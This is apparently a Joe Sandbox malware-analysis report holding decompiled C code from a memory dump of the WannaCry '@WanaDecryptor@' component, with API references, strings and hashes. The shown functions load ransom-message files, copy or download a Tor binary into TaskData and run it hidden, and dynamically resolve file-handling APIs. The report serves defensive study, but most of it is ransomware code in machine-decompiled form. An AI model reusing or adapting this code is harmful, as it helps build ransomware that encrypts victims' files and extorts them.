				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292);
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}


























                                  0x00406ae0
                                  0x00406ae2
                                  0x00406aed
                                  0x00406aee
                                  0x00406afc
                                  0x00406b03
                                  0x00406b08
                                  0x00406b0f
                                  0x00406b10
                                  0x00406b1b
                                  0x00406b20
                                  0x00406b29
                                  0x00406b2e
                                  0x00406b37
                                  0x00406b38
                                  0x00406b39
                                  0x00406b41
                                  0x00406b59
                                  0x00406b5b
                                  0x00406b62
                                  0x00406b6b
                                  0x00406b73
                                  0x00406b7d
                                  0x00406b86
                                  0x00406b88
                                  0x00406b91
                                  0x00406b96
                                  0x00406b9b
                                  0x00406b9c
                                  0x00406ba0
                                  0x00406ba8
                                  0x00406ba9
                                  0x00406bbb
                                  0x00406bbd
                                  0x00406bc4
                                  0x00406bcd
                                  0x00406bd5
                                  0x00406bd5
                                  0x00406be1
                                  0x00406bea
                                  0x00406bf5
                                  0x00406c03
                                  0x00406c10

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                  • String ID: English$m_%s.wnry$msg\
                                  • API String ID: 3713669620-4206458537
                                  • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                  • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B840 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 138synchronizationprocessfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				void* _t46;
				char _t47;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", 0x4220e4, 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						if(GetFileAttributesA( &_v520) != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0);
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", 0x422148);
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}
















                                  0x0040b846
                                  0x0040b84d
                                  0x0040b861
                                  0x0040b863
                                  0x0040b879
                                  0x0040b87a
                                  0x0040b885
                                  0x0040b892
                                  0x0040b95b
                                  0x0040b966
                                  0x0040b970
                                  0x0040b974
                                  0x0040b976
                                  0x0040b982
                                  0x0040b991
                                  0x0040b995
                                  0x0040b99f
                                  0x0040b9b2
                                  0x0040b9d6
                                  0x0040b9e2
                                  0x0040b9e2
                                  0x0040b9ef
                                  0x0040b9f6
                                  0x0040ba02
                                  0x0040b9b5
                                  0x0040b9be
                                  0x0040b9be
                                  0x0040b898
                                  0x0040b8a4
                                  0x0040b8a9
                                  0x0040b8ae
                                  0x0040b8e9
                                  0x0040b8e9
                                  0x0040b8f3
                                  0x0040b908
                                  0x0040b90a
                                  0x0040b923
                                  0x0040b924
                                  0x0040b929
                                  0x0040b939
                                  0x0040b955
                                  0x00000000
                                  0x0040b93c
                                  0x0040b945
                                  0x0040b945
                                  0x0040b8b0
                                  0x0040b8b0
                                  0x0040b8bc
                                  0x0040b8c1
                                  0x0040b8c6
                                  0x00000000
                                  0x0040b8c8
                                  0x0040b8c8
                                  0x0040b8d4
                                  0x0040b8d9
                                  0x0040b8de
                                  0x00000000
                                  0x0040b8e8
                                  0x0040b8e8
                                  0x0040b8e8
                                  0x0040b8de
                                  0x0040b8c6
                                  0x0040b8ae

                                  APIs
                                  • sprintf.MSVCRT ref: 0040B87A
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                  • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  • sprintf.MSVCRT ref: 0040B924
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                    • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                    • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                    • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                    • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                  • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                  • String ID: %s\%s\%s$D$TaskData$Tor$taskhsvc.exe$tor.exe
                                  • API String ID: 4284242699-636499233
                                  • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                  • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}





                                  0x00402c48
                                  0x00402d1d
                                  0x00402d20
                                  0x00402c4e
                                  0x00402c55
                                  0x00402c69
                                  0x00402c6d
                                  0x00000000
                                  0x00402c73
                                  0x00402c88
                                  0x00402c95
                                  0x00402ca2
                                  0x00402caf
                                  0x00402cbc
                                  0x00402cc9
                                  0x00402cce
                                  0x00402cd6
                                  0x00402cde
                                  0x00000000
                                  0x00402d16
                                  0x00402d1c
                                  0x00402d1c
                                  0x00402cde
                                  0x00402c57
                                  0x00402c5d
                                  0x00402c5d
                                  0x00402c55

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                  • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                  • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                  • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                  • API String ID: 2238633743-1294736154
                                  • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                  • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0();
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152);
					L00412DE2();
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}























































                                  0x00405580
                                  0x00405582
                                  0x0040558d
                                  0x0040558e
                                  0x0040559e
                                  0x004055a9
                                  0x004055b2
                                  0x004055b4
                                  0x004055b8
                                  0x004055bd
                                  0x004055c1
                                  0x004055d0
                                  0x004055d5
                                  0x004055de
                                  0x004055e5
                                  0x004055ed
                                  0x004055f1
                                  0x004055f9
                                  0x004055fd
                                  0x00405601
                                  0x00405605
                                  0x0040560d
                                  0x0040561a
                                  0x00405620
                                  0x00405626
                                  0x0040562a
                                  0x0040563f
                                  0x00405641
                                  0x0040564c
                                  0x00405652
                                  0x00405657
                                  0x0040565c
                                  0x0040565d
                                  0x00405664
                                  0x00405666
                                  0x00405666
                                  0x00405669
                                  0x0040566a
                                  0x0040566e
                                  0x0040566f
                                  0x00405677
                                  0x0040567c
                                  0x0040567e
                                  0x00405686
                                  0x0040568c
                                  0x0040569e
                                  0x004056a4
                                  0x004056a8
                                  0x004056ac
                                  0x004056b2
                                  0x004056bc
                                  0x004056c8
                                  0x004056e7
                                  0x0040570b
                                  0x00405719
                                  0x0040571c
                                  0x0040571e
                                  0x00405721
                                  0x00000000
                                  0x00405723
                                  0x00405723
                                  0x00405729
                                  0x0040572d
                                  0x00000000
                                  0x0040572f
                                  0x0040572f
                                  0x00405734
                                  0x00000000
                                  0x00405736
                                  0x0040573a
                                  0x0040574c
                                  0x0040574e
                                  0x00405753
                                  0x00405757
                                  0x00000000
                                  0x00405757
                                  0x0040573a
                                  0x00405734
                                  0x0040572d
                                  0x00405729
                                  0x00000000
                                  0x0040575b
                                  0x00405763
                                  0x00405766
                                  0x00405766
                                  0x004056b2
                                  0x00405770
                                  0x00405770
                                  0x00405777
                                  0x00405779
                                  0x00405779
                                  0x0040577c
                                  0x00405781
                                  0x00405782
                                  0x0040578b
                                  0x0040579b
                                  0x004057a2
                                  0x004057a8
                                  0x004057b0
                                  0x004057b9
                                  0x004057c4
                                  0x004057c4
                                  0x004057d3
                                  0x004057e0

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                  • String ID:
                                  • API String ID: 1233696098-0
                                  • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                  • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}
























































                                  0x00408d70
                                  0x00408d70
                                  0x00408d72
                                  0x00408d7d
                                  0x00408d7e
                                  0x00408d88
                                  0x00408d8d
                                  0x00408d92
                                  0x00408d9f
                                  0x00408dab
                                  0x00408daf
                                  0x00408dc5
                                  0x00408dd6
                                  0x00408dd8
                                  0x00408dde
                                  0x00408de2
                                  0x00408de6
                                  0x00408def
                                  0x00408df1
                                  0x00408df5
                                  0x00408df8
                                  0x00408e05
                                  0x00408e07
                                  0x00408e09
                                  0x00408e09
                                  0x00408e0d
                                  0x00408e10
                                  0x00408e14
                                  0x00408e21
                                  0x00408e28
                                  0x00408e2a
                                  0x00408e2a
                                  0x00408e16
                                  0x00408e16
                                  0x00408e16
                                  0x00408e31
                                  0x00408e44
                                  0x00408e48
                                  0x00408e4a
                                  0x00408e4a
                                  0x00408e5a
                                  0x00408e5c
                                  0x00408e5c
                                  0x00408e67
                                  0x00408e6e
                                  0x00408e75
                                  0x00408e81
                                  0x00408e89
                                  0x00408e8d
                                  0x00408e91
                                  0x00408e93
                                  0x00408e97
                                  0x00408e9b
                                  0x00408e9d
                                  0x00408ea1
                                  0x00408ea5
                                  0x00408eaa
                                  0x00408eae
                                  0x00408ec2
                                  0x00408ed6
                                  0x00408ed8
                                  0x00408ed8
                                  0x00408ed6
                                  0x00408eea
                                  0x00408eec
                                  0x00408ef3
                                  0x00408ef5
                                  0x00408efe
                                  0x00408f02
                                  0x00408f06
                                  0x00408f0e
                                  0x00408f18
                                  0x00408f1f
                                  0x00408f26
                                  0x00408f2a
                                  0x00408f31
                                  0x00408f38
                                  0x00408f3e
                                  0x00408f42
                                  0x004090b6
                                  0x004090b6
                                  0x004090c2
                                  0x004090ca
                                  0x004090d7
                                  0x004090e1
                                  0x00408f48
                                  0x00408f51
                                  0x00408f51
                                  0x00408f55
                                  0x00408f60
                                  0x00408f65
                                  0x00408f6a
                                  0x00408f6e
                                  0x00408f70
                                  0x00408f74
                                  0x00408f78
                                  0x00408f7f
                                  0x00408f8b
                                  0x00408f8d
                                  0x00408f96
                                  0x00408f9f
                                  0x00408fa2
                                  0x00408fa2
                                  0x00408fa6
                                  0x00408fad
